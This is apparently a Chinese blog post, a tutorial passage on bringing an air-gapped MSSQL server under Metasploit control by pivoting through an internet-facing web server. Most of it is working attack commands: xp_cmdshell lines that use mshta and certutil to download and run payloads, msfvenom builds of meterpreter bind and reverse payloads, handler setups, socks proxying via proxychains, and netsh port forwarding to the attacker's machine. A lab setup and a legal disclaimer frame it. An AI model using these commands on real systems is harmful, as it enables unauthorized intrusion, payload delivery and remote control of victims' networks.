声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。 |
---|
192.168.186.4->192.168.186.3:443->192.168.56.102->C2
EXEC master..xp_cmdshell 'mshta http://192.168.186.3:8080/yGwnzfy4cc.hta'
注意事项:
添加虚拟路由后配置hta_server模块选项时SRVHOST如果还用默认的0.0.0.0
则生成URL的IP地址还是VPS的,所以在不出网主机上无法访问和执行,最终导致无法上线。
思路拓展:
bind_tcp/reverse_tcp/reverse_tcp_rc4与hta_server的利用方式差不多,都要用到MSF虚拟路由,只是要重新生成/上传载荷文件。这种方式在某些不出网场景下“文件落地”可能是个麻烦事,不过在我们模拟的这个场景下可以利用这台可以出网的Web服务器来进行文件落地。
EXEC master..xp_cmdshell 'certutil -urlcache -split -f http://192.168.186.3/msf.exe C:\ProgramData\msf.exe'
0x04 Socks代理 + Proxychains
我们先用autoroute模块自动添加虚拟路由,再用MSF中的Socks模块开一个Socks代理,设置选项可以不做修改,直接默认执行即可。MSF6已将socks4/5都集成到socks_proxy模块中了。
run post/multi/manage/autoroute bg use auxiliary/server/socks4a exploit
Socks4代理开好后找到/etc/proxychains.conf配置文件,在底部填入127.0.0.1和1080端口,然后再用proxychains代理工具执行curl或nc验证下看是否已经代理成功?
proxychains curl http://192.168.186.4 proxychains nc -zv 192.168.186.4 1433
确定Socks代理没问题后再使用msfvenom生成一个bind_tcp载荷文件,通过中国菜刀将该文件上传至192.168.186.3的Web服务器中供192.168.186.4断网数据库服务器下载。
msfvenom -p windows/x64/meterpreter/bind_tcp lport=443 -f exe > /var/www/html/bind.exe
另起一个命令终端用proxychains代理工具来启动msfconsole,配置好handler监听模块bind_tcp相关选项执行监听,在中国菜刀中利用xp_cmdshell组件执行bind.exe文件后即可上线。
流量走向:
192.168.186.4:443->192.168.186.3->Socks4->192.168.56.101
proxychains msfconsole -q use exploit/multi/handler set payload windows/x64/meterpreter/bind_tcp set rhost 192.168.186.4 set lport 443 exploit EXEC master..xp_cmdshell 'C:\ProgramData\bind.exe' 0x05 netsh interface portproxy 我们先执行以下命令添加一个端口转发规则,将可以出网的Web服务器443端口流量全部转发至攻击机192.168.56.101的4444端口,添加完成后去看下443端口是否已经开放? 添加端口转发 netsh interface portproxy add v4tov4 listenport=443 connectaddress=192.168.56.101 connectport=4444 删除端口转发 netsh interface portproxy delete v4tov4 listenport=443 显示所有端口转发 netsh interface portproxy show all 微软官方文档: https://docs.microsoft.com/zh-cn/windows-server/networking/technologies/netsh/netsh-interface-portproxy 执行以上命令有权限限制,需要≥Administrators才能执行,低权限用户执行时会出现下图提示,中文意思是:请求的操作需要提升(以管理员身份运行)。 使用msfvenom生成一个reverse_tcp_rc4载荷文件,同样通过中国菜刀将该文件上传至192.168.186.3的Web服务器中供192.168.186.4断网数据库服务器下载。
LHOST
:出网主机186段内网IP地址;LPORT
:出网主机需转发的443端口;RC4PASSWORD
:验证密码;msfvenom -p windows/x64/meterpreter/reverse_tcp_rc4 LHOST=192.168.186.3 LPORT=443 RC4PASSWORD=3had0w -f exe > /var/www/html/fuck.exe handler监听模块这里必须也要用reverse_tcp_rc4,配置好相关选项后执行监听,在中国菜刀中利用xp_cmdshell组件执行fuck.exe文件后即可上线。
lhost
:攻击机IP(192.168.56.101);lport
:转发过来的4444端口,其它端口无效;rc4password
:填验证密码,msfconsole -q use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp_rc4 set lhost 192.168.56.101 set lport 4444 set rc4password 3had0w exploit EXEC master..xp_cmdshell 'C:\ProgramData\fuck.exe' 为什么最终建立连接时显示的是:192.168.56.101:4444 -> 192.168.56.102:50178???因为我们在Web服务器中做了端口转发,看下图这两台主机的网络连接状态就应该知道咋回事了。 流量走向:
192.168.186.4->192.168.186.3:443->192.168.56.102->C2
0x06 文末小结
在本节中简单介绍了3种MSF上线断网机的姿势,使用goproxy http、pystinger Socks4a等姿势也是可以的,都需要通过出网主机流量才能与不出网主机进行通讯(上线),最终流量走向都是:不出网主机->出网主机->VPS
,大家可以根据文章中提供的方法自行拓展新姿势,只要你姿势足够骚,就没有打不进去的,0.0。